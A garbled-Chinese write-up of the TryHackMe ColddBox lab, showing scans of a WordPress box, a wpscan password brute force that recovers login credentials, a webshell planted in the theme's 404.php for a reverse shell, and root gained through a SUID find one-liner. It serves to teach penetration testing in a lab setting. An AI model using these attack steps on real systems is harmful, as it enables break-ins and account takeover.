免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(rootkali)-[~/tryhackme/ColddBox]└─# nmap -sV -Pn 10.10.165.236Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 08:22 EDTStats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanNmap scan report for 10.10.165.236Host is up (0.31s latency).Not shown: 999 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 101.75 seconds只有一个http服务,关上80端口首页是一个经典的wordpress站点
爆破站点目录
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.165.236 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.165.236/_21-11-06_08-25-32.txtError Log: /root/dirsearch/logs/errors-21-11-06_08-25-32.logTarget: http://10.10.165.236/[08:25:35] Starting: [08:26:37] 301 - 0B - /index.php -> http://10.10.165.236/ [08:26:37] 301 - 0B - /index.php/login/ -> http://10.10.165.236/login/[08:26:40] 200 - 19KB - /license.txt [08:26:57] 200 - 7KB - /readme.html [08:26:59] 403 - 278B - /server-status/ [08:26:59] 403 - 278B - /server-status [08:27:15] 301 - 317B - /wp-admin -> http://10.10.165.236/wp-admin/ [08:27:15] 302 - 0B - /wp-admin/ -> /wp-login.php?redirect_to=http%3A%2F%2F10.10.165.236%2Fwp-admin%2F&reauth=1[08:27:15] 301 - 319B - /wp-content -> http://10.10.165.236/wp-content/ [08:27:15] 200 - 0B - /wp-content/ [08:27:15] 200 - 69B - /wp-content/plugins/akismet/akismet.php [08:27:15] 500 - 3KB - /wp-admin/setup-config.php [08:27:15] 500 - 0B - /wp-content/plugins/hello.php [08:27:15] 200 - 777B - /wp-content/upgrade/ [08:27:15] 200 - 0B - /wp-cron.php [08:27:15] 500 - 0B - /wp-includes/rss-functions.php [08:27:15] 302 - 0B - /wp-signup.php -> /wp-login.php?action=register [08:27:15] 200 - 0B - /wp-config.php [08:27:15] 200 - 1B - /wp-admin/admin-ajax.php [08:27:16] 200 - 1KB - /wp-admin/install.php [08:27:16] 301 - 320B - /wp-includes -> http://10.10.165.236/wp-includes/[08:27:16] 200 - 42B - /xmlrpc.php [08:27:16] 200 - 26KB - /wp-includes/ [08:27:17] 200 - 2KB - /wp-login.php Task Completed 还是挺多wp的根本目录爆进去的,而且存在目录遍历破绽
wpscan开掘wp信息
┌──(rootkali)-[~/tryhackme/ColddBox]└─# wpscan --url http://10.10.165.236/ WARNING: Nokogiri was built against libxml version 2.9.10, but has dynamically loaded 2.9.12_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.14 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[i] Updating the Database ...[i] Update completed.[+] URL: http://10.10.165.236/ [10.10.165.236][+] Started: Sat Nov 6 08:27:50 2021Interesting Finding(s):[+] Headers | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.165.236/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] WordPress readme found: http://10.10.165.236/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%[+] The external WP-Cron seems to be enabled: http://10.10.165.236/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10). | Found By: Rss Generator (Passive Detection) | - http://10.10.165.236/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator> | - http://10.10.165.236/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>[+] WordPress theme in use: twentyfifteen | Location: http://10.10.165.236/wp-content/themes/twentyfifteen/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.165.236/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 3.0 | Style URL: http://10.10.165.236/wp-content/themes/twentyfifteen/style.css?ver=4.1.31 | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.0 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.165.236/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'[+] Enumerating All Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:13 <========================================================================================> (137 / 137) 100.00% Time: 00:00:13[i] No Config Backups Found.[!] No WPScan API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register[+] Finished: Sat Nov 6 08:28:19 2021[+] Requests Done: 186[+] Cached Requests: 5[+] Data Sent: 45.096 KB[+] Data Received: 17.49 MB[+] Memory used: 216.426 MB[+] Elapsed time: 00:00:29wp根本信息
确认wp版本号是:4.1.31
枚举wp用户:wpscan --url http://10.10.165.236 -e -U1-1000
[+] the cold in person | Found By: Rss Generator (Passive Detection)[+] c0ldd | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)[+] philip | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)[+] hugo | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)爆破c0ldd明码
wpscan --url http://10.10.165.236 -U c0ldd -P /usr/share/wordlists/rockyou.txt[+] Performing password attack on Wp Login against 1 user/s[SUCCESS] - c0ldd /9876543210 失去wp登录凭证:c0ldd : 9876543210
获取初始shell
登录后盾,在Apperarance->Editor,找到404.php,把webshell写进去,保留。
监听。首页拜访一个不存在的页面,触发反弹shell
┌──(rootkali)-[~/tryhackme/ColddBox]└─# nc -lnvp 1234 2 ⨯listening on [any] 1234 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.165.236] 39572Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 14:34:17 up 1:13, 0 users, load average: 0.01, 1.77, 2.83USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ iduid=33(www-data) gid=33(www-data) groups=33(www-data)提权到root
user.txt在c0ldd文件夹下,然而以后用户没有查看权限
传linpeas发现find命令是SUID,能够间接提权到root
www-data@ColddBox-Easy:/$ /usr/bin/find . -exec /bin/sh -p \; -quit/usr/bin/find . -exec /bin/sh -p \; -quit# ididuid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)# whoamiwhoamiroot曾经拿到root权限,因而咱们能够拿到所有flag